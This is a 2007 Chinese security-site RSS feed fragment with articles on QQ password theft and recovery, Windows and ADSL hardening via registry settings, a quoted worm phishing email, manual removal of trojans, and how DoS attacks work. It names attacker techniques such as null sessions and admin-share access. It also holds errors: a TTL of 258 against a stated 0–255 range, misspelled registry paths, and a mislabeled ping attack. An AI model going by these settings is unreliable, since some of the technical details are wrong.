	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>首先，说明下，最近太多朋友加我QQ，要我帮忙找回QQ密码。我只是QQ中国站［QQCN.<FONT face=Verdana>net</FONT>］的站长，估计QQ中国站这个名字让人家误会，也有朋友说是搜索引擎搜到我的，严重声明：QQ中国站是提供破解和免费的软件下载的站点，和找回QQ密码没有多大关系，希望以下<FONT face=Verdana>如何找回被盗的<FONT color=#800080>QQ</FONT>密码的文章对你有帮助，希望不要再找我了。更不要去找一些所谓收费帮忙找回QQ密码的，通过以下的几种方式，一般是可以自己找回QQ密码的，收费那些人帮你找回用的也是这些办法，大家就不要再浪费钱了，另外希望通过这个文章让没有丢失密码的朋友也提高密码安全意识<FONT face=Verdana>。</FONT></FONT> 
<P>&nbsp;&nbsp; &nbsp;目前QQ木马品种繁多，功能强大，且易学易用，连初学者也会用！正因为这样，QQ木马才那么容易泛滥成灾，现在的网吧，学校机房……30%都可能被人装上了木马，况且大家的防盗意识不高，QQ被盗已是常见事。当QQ被盗了，怎么才可以要回呢？！这是我在网上回答网友N遍的问题了，现在总结一下供大家参考：<BR><BR>&nbsp;&nbsp;&nbsp; 要想要回QQ有必要了解下QQ是怎么被盗的，“小黑客们”&nbsp;常用以下几种盗取QQ：<BR><BR>（1）装木马程序。QQ被盗95%都是中了别人装的木马程序。什么叫木马程序你也不必要理解，就当作是你上QQ时有个东西记录了你的QQ密码，然后通过邮件发送出去告诉别人。<BR><BR>（2）穷举盗号，也就是常说的在线破解。这种方法只对密码简单的用户有效，而且速度不佳，指定盗号的成功率几乎为零，除非盗你QQ那家伙的脑子有点问题，把密码改为：110，119，或在你密码后面加个1，0……等容易猜解的密码。不理解不要紧，你就当作有个人帮你要QQ时不懂密码，随意把数字，字母的所以组合当密码一个个去试到可以登陆为止！<BR><BR>（3）本地破解。当你在一台电脑上过QQ后会留下某些东西在电脑上，而后来者通过些手段把你留下的东西破解出来，这东西或许是你的QQ密码（你登陆QQ时选择保存密码的时候），或许是你的其他资料……<BR><BR>&nbsp;&nbsp; &nbsp;QQ被盗怎么要回QQ密码呢？首先声明，如果你的号码被盗，不是一定能找回的，但也不是绝对没有可能，因为世界上没有绝对的事情。<BR><BR>&nbsp;&nbsp; &nbsp;如果你申请密码保护的话直接去要就可以了，收不到邮件？有可能是网络繁忙，试多几次，等久点；有可能你的邮箱不支持，腾讯的密码邮件发不到。我们着重说下后者情况，很多人见发不到就放弃了。其实不要放弃，密码资料是可以修改的，或许你玩那么久QQ都没有注意到，那么现在得注意了。你可以去这里根据你的密码保护资料修改你的密码保护的邮箱。再去要回你的QQ！</P>]]></description>
</item>
<item>
	<title><![CDATA[将木马拒之门外]]></title>
	<link><![CDATA[http://www.csnic.net:81/n558c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:03:38 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[1、禁止IPC空连接 <BR>　　Cracker可以利用net&nbsp;use命令建立空连接，进而入侵，还有net&nbsp;view，nbtstat这些都是基于空连接的，禁止空连接就好了。打开注册表，找到Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous&nbsp;把这个值改成”1”即可。 <BR><BR>　　2、禁止At命令 <BR><BR>　　Cracker往往给你个木马然后让它运行，这时他就需要at命令了。打开管理工具-服务，禁用task&nbsp;scheduler服务即可。 <BR><BR>　　3、关闭超级终端服务 <BR><BR>　　如果你开了的话，这个漏洞都烂了，我不说了。 <BR><BR>　　4、关闭SSDP&nbsp;Discover&nbsp;Service服务 <BR><BR>　　这个服务主要用于启动家庭网络设备上的UPnP设备，服务同时会启动5000端口。可能造成DDOS攻击，让CPU使用达到100%，从而使计算机崩溃。照理说没人会对个人机器费力去做DDOS，但这个使用过程中也非常的占用带宽，它会不断的向外界发送数据包，影响网络传输速率，所以还是关了好。 <BR><BR>　　5、关闭Remote&nbsp;Registry服务 <BR><BR>　　看看就知道了，允许远程修改注册表?除非你真的脑子进水了。 <BR><BR>　　6、禁用TCP/IP上的NetBIOS <BR><BR>　　网上邻居-属性-本地连接-属性-Internet协议(TCP/IP)属性-高级-WINS面板-NetBIOS设置-禁用TCP/IP上的NetBIOS。这样Cracker就无法用nbtstat命令来读取你的NetBIOS信息和网卡MAC地址了。 <BR><BR>　　7、关闭DCOM服务 <BR><BR>　　这就是135端口了，除了被用做查询服务外，它还可能引起直接的攻击，关闭方法是：在运行里输入dcomcnfg，在弹出的组件服务窗口里选择默认属性标签，取消“在此计算机上启用分布式COM”即可。 <BR><BR>　　8、把共享文件的权限从“everyone”组改成“授权用户” <BR><BR>　　“everyone”&nbsp;在win2000中意味着任何有权进入你的网络的用户都能够获得这些共享资料。任何时候都不要把共享文件的用户设置成“everyone”组。包括打印共享，默认的属性就是“everyone”组的，一定不要忘了改。 <BR><BR>　　9、取消其他不必要的服务 <BR><BR>　　请根据自己需要自行决定，下面给出HTTP/FTP服务器需要最少的服务作为参考： <BR><BR>　　l&nbsp;Event&nbsp;Log <BR><BR>　　l&nbsp;License&nbsp;Logging&nbsp;Service <BR><BR>　　l&nbsp;Windows&nbsp;NTLM&nbsp;Security&nbsp;Support&nbsp;Provider <BR><BR>　　l&nbsp;Remote&nbsp;Procedure&nbsp;Call&nbsp;(RPC)&nbsp;Service <BR><BR>　　l&nbsp;Windows&nbsp;NT&nbsp;Server&nbsp;or&nbsp;Windows&nbsp;NT&nbsp;Workstation <BR><BR>　　l&nbsp;IIS&nbsp;Admin&nbsp;Service <BR><BR>　　l&nbsp;MSDTC <BR><BR>　　l&nbsp;World&nbsp;Wide&nbsp;Web&nbsp;Publishing&nbsp;Service <BR><BR>　　l&nbsp;Protected&nbsp;Storage <BR>&nbsp; <BR>10、更改TTL值&nbsp; <BR>&nbsp; <BR><BR>　　Cracker可以根据ping回的TTL值来大致判断你的操作系统，如： <BR><BR>　　TTL=107(WINNT); <BR><BR>　　TTL=108(win2000); <BR><BR>　　TTL=127或128(win9x); <BR><BR>　　TTL=240或241(linux); <BR><BR>　　TTL=252(solaris); <BR><BR>　　TTL=240(Irix); <BR><BR>　　实际上你可以自己更改的： <BR><BR>　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ <BR><BR>　　Parameters：DefaultTTL&nbsp;REG_DWORD&nbsp;0-0xff(0-255&nbsp;十进制,默认值128)改成一个莫名其妙的数字如258，起码让那些小菜鸟晕上半天，就此放弃入侵你也不一定哦。 <BR><BR>　　11、账户安全 <BR><BR>　　首先禁止一切账户，除了你自己，呵呵。然后把Administrator改名。我呢就顺手又建了个Administrator账户，不过是什么权限都没有的那种，然后打开记事本，一阵乱敲，复制，粘贴到“密码”里去，呵呵，来破密码吧!破完了才发现是个低级账户，看你崩溃不? <BR><BR>　　12、取消显示最后登录用户 <BR><BR>　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\Current&nbsp;Version\Winlogon：DontDisplayLastUserName把值改为1。 <BR><BR>　　13、删除默认共享 <BR><BR>　　有人问过我一开机就共享所有盘，改回来以后，重启又变成了共享是怎么回事，这是2K为管理而设置的默认共享，必须通过修改注册表的方式取消它： <BR><BR>　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\ <BR><BR>　　Parameters：AutoShareServer类型是REG_DWORD把值改为0即可。 <BR><BR>　　14、禁用LanManager&nbsp;身份验证 <BR><BR>　　Windows&nbsp;NT&nbsp;Servers&nbsp;Service&nbsp;Pack&nbsp;4&nbsp;和后续的版本都支持三种不同的身份验证方法：&nbsp;LanManager&nbsp;(LM)&nbsp;身份验证;Windows&nbsp;NT(也叫NTLM)身份验证;Windows&nbsp;NT&nbsp;Version&nbsp;2.0&nbsp;(也叫NTLM2)&nbsp;身份验证; <BR><BR>　　默认的情况下，当一个客户尝试连接一台同时支持LM&nbsp;和&nbsp;NTLM&nbsp;身份验证方法的服务器时，LM&nbsp;身份验证会优先被使用。所以建议禁止LM&nbsp;身份验证方法。 <BR><BR>　　1.&nbsp;打开注册表编辑器; <BR><BR>　　2.&nbsp;定位到&nbsp;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa; <BR><BR>　　3.&nbsp;选择菜单“编辑”，“添加数值”; <BR><BR>　　4.&nbsp;数值名称中输入：LMCompatibilityLevel&nbsp;，数值类型为：DWORD，单击&nbsp;确定; <BR><BR>　　5.&nbsp;双击新建的数据，并根据具体情况设置以下值： <BR><BR>　　0&nbsp;-&nbsp;发送&nbsp;LM&nbsp;和&nbsp;NTLM响应; <BR><BR>　　1&nbsp;-&nbsp;发送&nbsp;LM&nbsp;和&nbsp;NTLM响应; <BR><BR>　　2&nbsp;-&nbsp;仅发送&nbsp;NTLM响应; <BR><BR>　　3&nbsp;-&nbsp;仅发送&nbsp;NTLMv2响应;(Windows&nbsp;2000有效) <BR><BR>　　4&nbsp;-&nbsp;仅发送&nbsp;NTLMv2响应，拒绝&nbsp;LM;(Windows&nbsp;2000有效) <BR><BR>　　5&nbsp;-&nbsp;仅发送&nbsp;NTLMv2响应，拒绝&nbsp;LM&nbsp;和&nbsp;NTLM;(Windows&nbsp;2000有效) <BR><BR>　　6.&nbsp;关闭注册表编辑器; <BR><BR>　　7.&nbsp;重新启动机器。]]></description>
</item>
<item>
	<title><![CDATA[ADSL防御黑客攻击的十大方法]]></title>
	<link><![CDATA[http://www.csnic.net:81/n557c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:03:14 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>目前，使用ADSL的用户越来越多，由于ADSL用户在线时间长、速度快，因此成为&nbsp;黑客&nbsp;们的攻击目标。现在网上出现了各种越来越详细的“IP地址库”，要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢？不妨看看以下方法。&nbsp;&nbsp;&nbsp; <BR><BR>一、取消文件夹隐藏共享&nbsp;&nbsp;&nbsp; <BR><BR>如果你使用了Windows&nbsp;2000/XP系统，右键单击C盘或者其他盘，选择"共享"，你会惊奇地发现它已经被设置为“共享该文件夹”，而在“网上邻居”中却看不到这些内容，这是怎么回事呢？&nbsp;&nbsp;&nbsp; <BR><BR>原来，在默认状态下，Windows&nbsp;2000/XP会开启所有分区的隐藏共享，从“控制面板/管理工具/计算机管理”窗口下选择“系统工具/共享文件夹/共享”，就可以看到硬盘上的每个分区名后面都加了一个“$”。但是只要键入“\\计算机名或者IP\C$”，系统就会询问用户名和密码，遗憾的是，大多数个人用户系统Administrator的密码都为空，入侵者可以轻易看到C盘的内容，这就给网络安全带来了极大的隐患。&nbsp;&nbsp;&nbsp; <BR><BR>怎么来消除默认共享呢？方法很简单，打开&nbsp;注册表&nbsp;编辑器，进入“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Sevices\Lanmanworkstation\&nbsp;&nbsp;&nbsp; <BR>parameters”，新建一个名为“AutoShareWKs”的双字节值，并将其值设为“0”，然后重新启动电脑，这样共享就取消了。&nbsp;&nbsp;&nbsp; <BR><BR>二、拒绝&nbsp;恶意代码&nbsp;&nbsp;&nbsp; <BR><BR>恶意网页成了宽带的最大威胁之一。以前使用Modem，因为打开网页的速度慢，在完全打开前关闭恶意网页还有避免中招的可能性。现在宽带的速度这么快，所以很容易就被恶意网页攻击。&nbsp;&nbsp;&nbsp; <BR><BR>一般恶意网页都是因为加入了用编写的恶意代码才有破坏力的。这些恶意代码就相当于一些小程序，只要打开该网页就会被运行。所以要避免恶意网页的攻击只要禁止这些恶意代码的运行就可以了。&nbsp;&nbsp;&nbsp; <BR><BR>运行IE浏览器，点击“工具/Internet选项/安全/自定义级别”，将安全级别定义为“安全级-高”，对“ActiveX控件和插件”中第2、3项设置为“禁用”，其它项设置为“提示”，之后点击“确定”。这样设置后，当你使用IE浏览网页时，就能有效避免恶意网页中恶意代码的攻击。&nbsp;&nbsp;&nbsp; <BR><BR>三、封死黑客的“后门”&nbsp;&nbsp;&nbsp; <BR><BR>俗话说“无风不起浪”，既然黑客能进入，那说明系统一定存在为他们打开的“后门”，只要堵死这个后门，让黑客无处下手，便无后顾之忧！&nbsp;&nbsp;&nbsp; <BR><BR>1.删掉不必要的协议&nbsp;&nbsp;&nbsp; <BR><BR>对于服务器和主机来说，一般只安装TCP/IP协议就够了。鼠标右击“网络邻居”，选择“属性”，再鼠标右击“本地连接”，选择“属性”，卸载不必要的协议。其中NETBIOS是很多安全缺陷的根源，对于不需要提供文件和打印共享的主机，还可以将绑定在TCP/IP协议的NETBIOS关闭，避免针对NETBIOS的攻击。选择“TCP/IP协议/属性/高级”，进入“高级TCP/IP设置”对话框，选择“WINS”标签，勾选“禁用TCP/IP上的NETBIOS”一项，关闭NETBIOS。&nbsp;&nbsp;&nbsp; <BR><BR>2.关闭“文件和打印共享”&nbsp;&nbsp;&nbsp; <BR><BR>文件和打印共享应该是一个非常有用的功能，但在不需要它的时候，也是黑客入侵的很好的安全漏洞。所以在没有必要“文件和打印共享”的情况下，我们可以将它关闭。用鼠标右击“网络邻居”，选择“属性”，然后单击“文件和打印共享”按钮，将弹出的“文件和打印共享”对话框中的两个复选框中的钩去掉即可。&nbsp;&nbsp;&nbsp; <BR><BR>虽然“文件和打印共享”关闭了，但是还不能确保安全，还要修改注册表，禁止它人更改“文件和打印共享”。打开注册表编辑器，选择“HKEY_CURRENT_USER\Software\&nbsp;Microsoft&nbsp;\Windows\CurrentVersion\Policies\NetWork”主键，在该主键下新建DWORD类型的键值，键值名为“NoFileSharingControl”，键值设为“1”表示禁止这项功能，从而达到禁止更改“文件和打印共享”的目的；键值为“0”表示允许这项功能。这样在“网络邻居”的“属性”对话框中“文件和打印共享”就不复存在了。&nbsp;&nbsp;&nbsp; <BR><BR>3.把Guest账号禁用&nbsp;&nbsp;&nbsp; <BR><BR>有很多入侵都是通过这个账号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具，那还是禁止的好。打开控制面板，双击“用户和密码”，单击“高级”选项卡，再单击“高级”按钮，弹出本地用户和组窗口。在Guest账号上面点击右键，选择属性，在“常规”页中选中“账户已停用”。另外，将Administrator账号改名可以防止黑客知道自己的管理员账号，这会在很大程度上保证计算机安全。&nbsp;&nbsp;&nbsp; <BR><BR>4.禁止建立空连接&nbsp;&nbsp;&nbsp; <BR><BR>在默认的情况下，任何用户都可以通过空连接连上服务器，枚举账号并猜测密码。因此，我们必须禁止建立空连接。方法有以下两种：&nbsp;&nbsp;&nbsp; <BR><BR>方法一是修改注册表：打开注册表“HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA”，将DWORD值“RestrictAnonymous”的键值改为“1”即可。&nbsp;&nbsp;&nbsp; <BR><BR>最后建议大家给自己的系统打上补丁，&nbsp;微软&nbsp;那些没完没了的补丁还是很有用的！&nbsp;&nbsp;&nbsp; <BR><BR>四、隐藏IP地址&nbsp;&nbsp;&nbsp; <BR><BR>黑客经常利用一些网络探测技术来查看我们的主机信息，主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念，如果攻击者知道了你的IP地址，等于为他的攻击准备好了目标，他可以向这个IP发动各种进攻，如DoS(&nbsp;拒绝服务&nbsp;)攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。&nbsp;&nbsp;&nbsp; <BR><BR>与直接连接到Internet相比，使用代理服务器能保护上网用户的IP地址，从而保障上网安全。代理服务器的原理是在客户机（用户上网的计算机）和远程服务器（如用户想访问远端WWW服务器）之间架设一个“中转站”，当客户机向远程服务器提出服务要求后，代理服务器首先截取用户的请求，然后代理服务器将服务请求转交远程服务器，从而实现客户机和远程服务器之间的联系。很显然，使用代理服务器后，其它用户只能探测到代理服务器的IP地址而不是用户的IP地址，这就实现了隐藏用户IP地址的目的，保障了用户上网安全。提供免费代理服务器的网站有很多，你也可以自己用代理猎手等工具来查找。&nbsp;&nbsp;&nbsp; <BR><BR>五、关闭不必要的端口&nbsp;&nbsp;&nbsp; <BR><BR>黑客在入侵时常常会扫描你的计算机端口，如果安装了端口监视程序（比如Netwatch），该监视程序则会有警告提示。如果遇到这种入侵，可用&nbsp;工具软件&nbsp;关闭用不到的端口，比如，用“Norton&nbsp;Internet&nbsp;Security”关闭用来提供网页服务的80和443端口，其他一些不常用的端口也可关闭。&nbsp;&nbsp;&nbsp; <BR><BR>六、更换管理员帐户&nbsp;&nbsp;&nbsp; <BR><BR>Administrator帐户拥有最高的系统权限，一旦该帐户被人利用，后果不堪设想。黑客入侵的常用手段之一就是试图获得Administrator帐户的密码，所以我们要重新配置Administrator帐号。&nbsp;&nbsp;&nbsp; <BR><BR>首先是为Administrator帐户设置一个强大复杂的密码，然后我们重命名Administrator帐户，再创建一个没有管理员权限的Administrator帐户欺骗入侵者。这样一来，入侵者就很难搞清哪个帐户真正拥有管理员权限，也就在一定程度上减少了危险性。&nbsp;&nbsp;&nbsp; <BR><BR>七、杜绝Guest帐户的入侵&nbsp;&nbsp;&nbsp; <BR><BR>Guest帐户即所谓的来宾帐户，它可以访问计算机，但受到限制。不幸的是，Guest也为黑客入侵打开了方便之门！网上有很多文章中都介绍过如何利用Guest用户得到管理员权限的方法，所以要杜绝基于Guest帐户的系统入侵。&nbsp;&nbsp;&nbsp; <BR><BR>禁用或彻底删除Guest帐户是最好的办法，但在某些必须使用到Guest帐户的情况下，就需要通过其它途径来做好防御工作了。首先要给Guest设一个强壮的密码，然后详细设置Guest帐户对物理路径的访问权限。举例来说，如果你要防止Guest用户可以访问tool文件夹，可以右击该文件夹，在弹出菜单中选择“安全”标签，从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户即可。或者在权限中为相应的用户设定权限，比方说只能“列出文件夹目录”和“读取”等，这样就安全多了。&nbsp;&nbsp;&nbsp; <BR><BR>八、安装必要的安全软件&nbsp;&nbsp;&nbsp; <BR><BR>我们还应在电脑中安装并使用必要的防黑软件，杀毒软件和&nbsp;防火墙&nbsp;都是必备的。在上网时打开它们，这样即便有黑客进攻我们的安全也是有保证的。&nbsp;&nbsp;&nbsp; <BR><BR>九、防范木马程序&nbsp;&nbsp;&nbsp; <BR><BR>木马程序会窃取所植入电脑中的有用信息，因此我们也要防止被黑客植入木马程序，常用的办法有：&nbsp;&nbsp;&nbsp; <BR><BR>●&nbsp;在下载文件时先放到自己新建的文件夹里，再用杀毒软件来检测，起到提前预防的作用。&nbsp;&nbsp;&nbsp; <BR><BR>●&nbsp;在“开始”→“程序”→“启动”或“开始”→“程序”→“Startup”选项里看是否有不明的运行项目，如果有，删除即可。&nbsp;&nbsp;&nbsp; <BR><BR>●&nbsp;将注册表里&nbsp;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的所有以“Run”为前缀的可疑程序全部删除即可。&nbsp;&nbsp;&nbsp; <BR><BR>十、不要回陌生人的邮件&nbsp;&nbsp;&nbsp; <BR><BR>有些黑客可能会冒充某些正规网站的名义，然后编个冠冕堂皇的理由寄一封信给你要求你输入上网的用户名称与密码，如果按下“确定”，你的帐号和密码就进了黑客的邮箱。所以不要随便回陌生人的邮件，即使他说得再动听再诱人也不上当。&nbsp;&nbsp;&nbsp; <BR><BR>做好IE的安全设置&nbsp;&nbsp;&nbsp; <BR><BR>ActiveX控件和&nbsp;Applets有较强的功能，但也存在被人利用的隐患，网页中的恶意代码往往就是利用这些控件编写的小程序，只要打开网页就会被运行。所以要避免恶意网页的攻击只有禁止这些恶意代码的运行。IE对此提供了多种选择，具体设置步骤是：“工具”→“Internet选项”→“安全”→“自定义级别”，建议您将ActiveX控件与相关选项禁用。谨慎些总没有错！&nbsp;&nbsp;&nbsp; <BR><BR>另外，在IE的安全性设定中我们只能设定Internet、本地Intranet、受信任的站点、受限制的站点。不过，微软在这里隐藏了“我的电脑”的安全性设定，通过修改注册表把该选项打开，可以使我们在对待ActiveX控件和&nbsp;Applets时有更多的选择，并对本地电脑安全产生更大的影响。&nbsp;&nbsp;&nbsp; <BR><BR>下面是具体的方法：打开“开始”菜单中的“运行”，在弹出的“运行”对话框中输入Regedit.exe，打开注册表编辑器，点击前面的“+”号顺次展开到：HKEY_CURRE-NT_USER\Software\Microsoft\Windows\CurrentVersion\InternetSettings\Zones\0，在右边窗口中找到DWORD值“Flags”，默认键值为十六进制的21(十进制33)，双击“Flags”，在弹出的对话框中将它的键值改为“1”即可，关闭注册表编辑器。无需重新启动电脑，重新打开IE，再次点击“工具→Internet选项→安全”标签，你就会看到多了一个“我的电脑”图标，在这里你可以设定它的安全等级。将它的安全等级设定高些，这样的防范更严密。</P>]]></description>
</item>
<item>
	<title><![CDATA[恶意邮件蠕虫假冒安全更新引诱用户上当]]></title>
	<link><![CDATA[http://www.csnic.net:81/n556c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:02:13 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>Technologies警告称，目前又发现一种通过电子邮件传播的恶意蠕虫，能够给用户的计算机造成很大的破坏。 </P>
<P>据Theinquirer.net网站报道，这家安全公司介绍说，这种电子邮件一般写得很差，几乎没有什么意义。这种电子邮件谈论的内容是机器人、补丁和蠕虫。下面是这种电子邮件的全文： </P>
<P><BR>亲爱的用户:<BR>我们的机器人修复了来自你发送电子邮件的IP地址的一个异常行为。<BR>也许这种异常行为与上一次的蠕虫感染有关。<BR>这个蠕虫感染现在还没有使用补丁修复。<BR>我们建议你安装一个防火墙模块。它将阻止发送上述电子邮件。<BR>否则，你的电子邮件账户将被封锁，直到你消除这个错误为止。<BR>客户技术支持中心机器人<BR>&nbsp;</P>
<P>据MicroWorld公司称，许多用户被这种系统生成性质的文本信息所迷惑。MicroWorld首席执行官Govind Rammurthy表示，许多用户以为这种电子邮件是机器发出来的，而不是人类发出来的，从而麻痹了用户鉴别真伪的能力。 </P>
<P>这种蠕虫名为“Warazov”，也称作“Warazov”。这是一种可执行文件，能够把各种恶意软件安装到你的计算机中并且能够把自己发送到地址簿中的每一个收件人。MicroWorld警告用户千万不要麻痹大意。</P>]]></description>
</item>
<item>
	<title><![CDATA[手工清除隐藏的病毒和木马]]></title>
	<link><![CDATA[http://www.csnic.net:81/n555c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:01:53 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[注册表一直都是很多木马和病毒“青睐”的寄生场所，注意在检查注册表之前要先给注册表备份。&nbsp; <BR><BR>　　1、&nbsp;检查注册表中HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Run和HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Runserveice，查看键值中有没有自己不熟悉的自动启动文件，扩展名一般为EXE，然后记住木马程序的文件名，再在整个注册表中搜索，凡是看到了一样的文件名的键值就要删除，接着到电脑中找到木马文件的藏身地将其彻底删除?比如“爱虫”病毒会修改上面所提的第一项，BO2000木马会修改上面所提的第二项)。&nbsp; <BR><BR>　　2、&nbsp;检查注册表HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER＼SOFTWARE＼Microsoft＼Internet&nbsp;Explorer＼Main中的几项(如Local&nbsp;Page)，如果发现键值被修改了，只要根据你的判断改回去就行了。恶意代码(如“万花谷”)就经常修改这几项。&nbsp; <BR><BR>　　3、检查HKEY_CLASSES_ROOT＼inifile&nbsp;＼shell＼open＼command和HKEY_CLASSES_ROOT&nbsp;＼txtfile＼shell＼open＼command等等几个常用文件类型的默认打开程序是否被更改。这个一定要改回来，很多病毒就是通过修改.txt、.ini等的默认打开程序而清除不了的。例如“罗密欧与朱丽叶”?BleBla病毒就修改了很多文件(包括.jpg、.rar、.mp3等)的默认打开程序。&nbsp; <BR><BR>　　检查你的系统配置文件&nbsp; <BR><BR>　　其实检查系统配置文件最好的方法是打开Windows“系统配置实用程序”(从开始菜单运行msconfig.exe)，在里面你可以配置Config.sys、Autoexec.bat、system.ini和win.ini，并且可以选择启动系统的时间。&nbsp; <BR><BR>　　1、检查win.ini文件(在C?＼windows＼下)，打开后，在?WINDOWS?下面，“run=”和“load=”是可能加载“木马”程序的途径，必须仔细留心它们。在一般情况下，在它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了。比如攻击QQ的“GOP木马”就会在这里留下痕迹。&nbsp; <BR><BR>　　2、检查system.ini文件(在C:＼windows＼下)，在BOOT下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是“explorer.exe”，而是“shell=&nbsp;explorer.exe&nbsp;程序名”，那么后面跟着的那个程序就是“木马”程序，然后你就要在硬盘找到这个程序并将其删除了。这类的病毒很多，比如“尼姆达”病毒就会把该项修改为“shell=explorer.exe&nbsp;load.exe&nbsp;-dontrunold”。&nbsp;]]></description>
</item>
<item>
	<title><![CDATA[常见拒绝服务攻击类型及分析]]></title>
	<link><![CDATA[http://www.csnic.net:81/n554c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 06:59:28 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>2007真不愧是黑客年,这两天很多客户来电称被拒绝服务,这样的事情的确是非常麻烦,不过现在的情况来看更多的攻击则来自有商业利益的攻击行为，这不得不值得我们去思考。<BR>&nbsp;&nbsp;&nbsp; <BR>拒绝服务攻击即攻击者想办法让目标机器停止提供服务或资源访问。这些资源包括磁盘空间、内存、进程甚至网络带宽，从而阻止正常用户的访问。其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一小部分，只要能够对目标造成麻烦，使某些服务被暂停甚至主机死机，都属于拒绝服务攻击。拒绝服务攻击问题也一直得不到合理的解决，究其原因是因为这是由于网络协议本身的安全缺陷造成的，从而拒绝服务攻击也成为了攻击者的终极手法。 </P>
<P>攻击者进行拒绝服务攻击，实际上让服务器实现两种效果：一是迫使服务器的缓冲区满，不接收新的请求；二是使用IP欺骗，迫使服务器把合法用户的连接复位，影响合法用户的连接。</P>
<P>接下来了解一下几种常见的拒绝服务攻击的原理：</P>
<P>1．SYN Foold<BR>SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(Distributed Denial Of Service分布式拒绝服务攻击)的方式之一，这是一种利用TCP协议缺陷，发送大量伪造的TCP连接请求，使被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。 </P>
<P>SYN Flood攻击的过程在TCP协议中被称为三次握手(Three-way Handshake)，而SYN Flood拒绝服务攻击就是通过三次握手而实现的。</P>
<P>(1) 攻击者向被攻击服务器发送一个包含SYN标志的TCP报文，SYN(Synchronize)即同步报文。同步报文会指明客户端使用的端口以及TCP连接的初始序号。这时同被攻击服务器建立了第一次握手。</P>
<P>(2) 受害服务器在收到攻击者的SYN报文后，将返回一个SYN+ACK的报文，表示攻击者的请求被接受，同时TCP序号被加一，ACK(Acknowledgement)即确认，这样就同被攻击服务器建立了第二次握手。</P>
<P>(3) 攻击者也返回一个确认报文ACK给受害服务器，同样TCP序列号被加一，到此一个TCP连接完成，三次握手完成。</P>
<P>具体原理是：TCP连接的三次握手中，假设一个用户向服务器发送了SYN报文后突然死机或掉线，那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成)，这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接。这段时间的长度我们称为SYN Timeout，一般来说这个时间是分钟的数量级(大约为30秒~2分钟)；一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题，但如果有一个恶意的攻击者大量模拟这种情况(伪造IP地址)，服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源。即使是简单的保存并遍历也会消耗非常多的CPU时间和内存，何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大，最后的结果往往是堆栈溢出崩溃—— 既使服务器端的系统足够强大，服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小)，此时从正常客户的角度看来，服务器失去响应，这种情况就称作：服务器端受到了SYN Flood攻击(SYN洪水攻击)。 </P>
<P>2．IP欺骗DOS攻击 <BR>这种攻击利用RST位来实现。假设现在有一个合法用户(61.61.61.61)已经同服务器建立了正常的连接，攻击者构造攻击的TCP数据，伪装自己的IP为61.61.61.61，并向服务器发送一个带有RST位的TCP数据段。服务器接收到这样的数据后，认为从61.61.61.61发送的连接有错误，就会清空缓冲区中建立好的连接。这时，如果合法用户61.61.61.61再发送合法数据，服务器就已经没有这样的连接了，该用户就必须从新开始建立连接。攻击时，攻击者会伪造大量的IP地址，向目标发送RST数据，使服务器不对合法用户服务，从而实现了对受害服务器的拒绝服务攻击。 </P>
<P>3. UDP洪水攻击<BR>攻击者利用简单的TCP/IP服务，如Chargen和Echo来传送毫无用处的占满带宽的数据。通过伪造与某一主机的Chargen服务之间的一次的UDP连接，回复地址指向开着Echo服务的一台主机，这样就生成在两台主机之间存在很多的无用数据流，这些无用数据流就会导致带宽的服务攻击。 </P>
<P>4. Ping洪流攻击<BR>由于在早期的阶段，路由器对包的最大尺寸都有限制。许多操作系统对TCP/IP栈的实现在ICMP包上都是规定64KB，并且在对包的标题头进行读取之后，要根据该标题头里包含的信息来为有效载荷生成缓冲区。当产生畸形的，声称自己的尺寸超过ICMP上限的包也就是加载的尺寸超过64K上限时，就会出现内存分配错误，导致TCP/IP堆栈崩溃，致使接受方死机。 </P>
